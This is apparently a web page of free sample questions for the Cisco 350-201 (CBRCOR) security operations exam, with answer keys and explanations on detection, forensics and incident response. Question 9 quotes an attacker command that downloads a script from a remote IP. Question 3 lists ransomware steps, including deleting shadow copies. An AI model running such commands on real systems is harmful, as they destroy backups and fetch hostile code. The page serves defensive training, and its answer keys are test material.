Performing Cybersecurity Using Cisco Security Technologies (CBRCOR) Free Sample Questions

Create a free account to browse all 20 sample questions. The full practice test includes 262 questions. Use the simulator for timed and flashcard mode.

Try Simulator

350-201 Sample Questions

  1. Question 1

    Q1

    A SOC analyst is reviewing NetFlow data from Cisco Secure Network Analytics (formerly Stealthwatch) and observes a sustained, low-volume stream of outbound traffic on TCP port 53 from a database server. This server is not authorized to perform DNS resolution for external domains. The traffic pattern avoids high-volume thresholds that would trigger standard alerts. Which analytic technique is most effective for identifying this potential DNS tunneling activity?

    Show answer & explanation

    Correct answer: B

    Behavioral anomaly detection is the most effective technique in this scenario. It establishes a baseline of normal activity for the database server and flags the new, unauthorized DNS traffic as a deviation, even if it is low-volume. Statistical volume analysis would likely miss this low-and-slow traffic. Signature-based detection is ineffective as DNS tunneling does not have a universal signature. Heuristic analysis of payloads is not possible with NetFlow, which primarily contains metadata.

  2. Question 2

    Q2Multiple answers

    A DevSecOps engineer is building a Python script to automate the enrichment of IP address indicators using the Cisco SecureX API. The script must check if an IP address has a malicious disposition and, if so, create a new sighting associated with a specific incident. Which two API endpoints are essential for this workflow? (Select TWO).

    Show answer & explanation

    Correct answers: B, D

    The /deliberate/observables endpoint is used to get dispositions (judgements) for observables like IP addresses from various threat intelligence sources integrated with SecureX. This step is necessary to determine if the IP is malicious.

    The /enrich/observe/observables endpoint is used to submit observables to SecureX. This action creates sightings, which link the observable (the malicious IP) to its source and context, effectively recording its presence in the environment for incident response and tracking.

  3. Question 3

    Q3

    During a malware analysis process in a sandbox environment, a file is observed performing the following sequence of actions:

    1. Executes vssadmin.exe Delete Shadows /All /Quiet.
    2. Makes numerous file modifications with high entropy in user directories.
    3. Establishes an outbound connection to a known Tor exit node.
    4. Deletes itself from the original execution path.

    Which type of malware is most likely being analyzed?

    Show answer & explanation

    Correct answer: C

    This sequence of actions is a classic signature of ransomware. Deleting volume shadow copies (vssadmin) prevents easy restoration of files. Modifying files with high entropy indicates encryption. C2 communication over Tor is common for anonymity, and self-deletion is a standard anti-forensics technique.

  4. Question 4

    Q4

    A SOC team is implementing a Threat Intelligence Platform (TIP) to automate the consumption of threat feeds. They need to use a standardized data format for representing cyber threat information and a protocol specifically designed for exchanging it. Which combination of standard and protocol should they implement?

    Show answer & explanation

    Correct answer: D

    STIX (Structured Threat Information eXpression) is the standardized language for describing threat information, while TAXII (Trusted Automated eXchange of Intelligence Information) is the application protocol for exchanging that information. This combination is the industry standard for automated threat intelligence sharing. The other options are for network monitoring (SNMP), log formatting (Syslog/CEF), and network flow data (NetFlow/IPFIX).

    flowchart LR subgraph Threat Feed Provider Intel_DB[(Threat Intel)] end subgraph TIP/SIEM TIP_Client[TAXII Client] end Intel_DB -->|STIX Data| TAXII_Server[TAXII Server] TAXII_Server -->|TAXII Protocol| TIP_Client

  5. Question 5

    Q5

    An incident responder is performing a forensic investigation on a compromised Windows Server. The initial alert from Cisco Secure Endpoint indicated a fileless malware attack executed via PowerShell. The server has been successfully isolated from the network to prevent lateral movement. To adhere to forensic best practices, the responder must collect evidence based on the order of volatility. Which action must be performed FIRST?

    Show answer & explanation

    Correct answer: B

    According to the order of volatility, data in RAM and CPU caches is the most volatile and must be collected first. For fileless malware that primarily resides in memory, capturing a live memory dump is the most critical first step. Shutting down the server or imaging the disk first would result in the loss of this crucial evidence.

  6. Question 6

    Q6

    A cybersecurity architect is designing a security posture for a hybrid cloud environment. A key requirement is to prevent endpoints from connecting to known malicious domains, IPs, and URLs, regardless of whether the endpoint is on the corporate network or connected remotely. The solution must provide DNS-layer security and act as a secure web gateway. Which Cisco security product is best suited to meet these requirements?

    Show answer & explanation

    Correct answer: C

    Cisco Umbrella is a cloud-delivered security service that provides the first line of defense against threats on the internet. It fulfills the requirements by offering DNS-layer security to block requests to malicious destinations before a connection is established, and it can also act as a secure web gateway for more in-depth inspection. It is effective for both on-premise and remote users.

  7. Question 7

    Q7

    True or False: In a CI/CD pipeline, static application security testing (SAST) is performed on running code in a production or staging environment to identify vulnerabilities.

    Show answer & explanation

    Correct answer: B

    The statement is false. Static Application Security Testing (SAST) analyzes an application's source code, byte code, or binary code for vulnerabilities without executing it. The described process of testing a running application is Dynamic Application Security Testing (DAST).

  8. Question 8

    Q8

    A financial services company, FinSecure, is undergoing a security audit. The auditor needs to review the company's incident response procedures. FinSecure's SOC uses a playbook for handling suspected phishing attacks that result in a user credential compromise. The playbook is initiated when a user reports a suspicious email, which is then analyzed by a SOAR platform.

    The SOAR platform automatically extracts indicators (URLs, attachment hashes) and enriches them using threat intelligence feeds. If an indicator is found to be malicious, an alert is generated. The playbook requires a SOC analyst to then perform several actions: force a password reset for the affected user, search email logs for other recipients of the same phishing email, and block the malicious indicators at the firewall and web proxy.

    According to the standard NIST incident response lifecycle (SP 800-61), which phase encompasses the analyst's actions of resetting the password and blocking the indicators?

    Show answer & explanation

    Correct answer: C

    The analyst's actions fall within the 'Containment, Eradication, & Recovery' phase. Specifically, forcing a password reset and blocking the malicious indicators are containment actions. They are designed to stop the incident from causing further damage and to prevent the threat actor from maintaining access. Detection & Analysis is the phase where the email is analyzed and confirmed as malicious.

  9. Question 9

    Q9

    While investigating a compromised Linux host, an analyst discovers that the attacker gained initial access and then downloaded a script from a remote server using the command curl -o /tmp/p.sh http://198.51.100.10/p.sh. The analyst needs to understand the script's contents without executing it. Which command should the analyst use to safely view the script?

    Show answer & explanation

    Correct answer: C

    The cat command (or alternatives like less or more) is used to display the contents of a file to standard output. This allows the analyst to read the script without executing any of its commands. The sh and source commands would execute the script, which is dangerous.

  10. Question 10

    Q10

    A security team uses a vulnerability scanner that reports a critical vulnerability (CVSS score 9.8) on an internal web server. However, the team determines that the server is located on a highly segmented network, is not accessible from the internet, and has a compensating control in place that mitigates the specific attack vector. How should this vulnerability be handled in the vulnerability management process?

    Show answer & explanation

    Correct answer: C

    The CVSS score represents the technical severity of a vulnerability, but not the actual risk to the organization. The risk should be evaluated based on context, including asset criticality, exposure, and compensating controls. In this case, the mitigating factors significantly lower the actual risk. The correct process is to document these factors, formally accept the risk (if it's within tolerance), and potentially lower the priority of patching.

Register free to unlock 10 more sample questions

Create a free account to continue with the rest of the 350-201 sample set.

Lifetime One

Own this practice test forever.

$79.99
$75.99
one-time
  • Full access to 262 questions
  • Study, Timed & Flashcard Modes
  • All past and future versions i
  • Detailed Explanations
  • Study Tracking & Past Attempts
  • Brainy AI Assistant
  • Lifetime updates

Two

Any 2 exams per month.

$20.00/exam
$39.99
/month
  • 2 active exam slots
  • Study, Timed & Flashcard Modes
  • All past and future versions i
  • Detailed Explanations
  • Study Tracking & Past Attempts
  • 1,000 Brainy AI Credits
  • Cancel anytime

Premium Twelve

Any 12 exams over 3 months.

$15.00/exam
$179.99
/3 months
  • 4 active exam slots
  • Study, Timed & Flashcard Modes
  • All past and future versions i
  • Detailed Explanations
  • Study Tracking & Past Attempts
  • 15,000 Brainy AI Credits
  • Dedicated support
  • Friend seat included — full access

Trusted by professionals at

NvidiaSupabaseGitHubOpenAITursoClerkClaude AIAmazon